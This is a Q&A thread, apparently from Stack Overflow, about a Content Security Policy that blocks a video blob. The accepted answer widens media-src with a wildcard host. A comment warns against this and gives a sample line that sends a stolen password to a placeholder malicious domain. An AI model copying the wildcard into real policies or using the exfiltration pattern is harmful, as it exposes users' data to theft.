# Refused to load media from 'blob:"blobfile" because it violates the following Content Security Policy directive: "media-src 'self'"

Tags: javascript, html, media, content-security-policy

I'm having problems get video, but before get pictures it's fine

my pic[image]

and my vid

[image]

and my error in blob http://localhost:6081/a564e7f1-e954-4b48-bc1f-d57ab4d80ced ( video blob )

[image]

in ContentSecurityPolicy: im just adding media-src 'self';

Answer (score 1, accepted):

try to adding this in content security policy `media-src 'self' data: blob: *;`

Comment: The asterisk is a wildcard allowing any hostname. If you want a stricter CSP, add http://localhost and any test/production hostnames

Comment: Don't add *. Adding * allows malicious code to exfiltrate data to any server. If an attacker manages to get code on your site that steals keystrokes, it can upload the data to its own server by making a request like <media src="my-malicious-domain/the-users-password-is-the-filename.mov">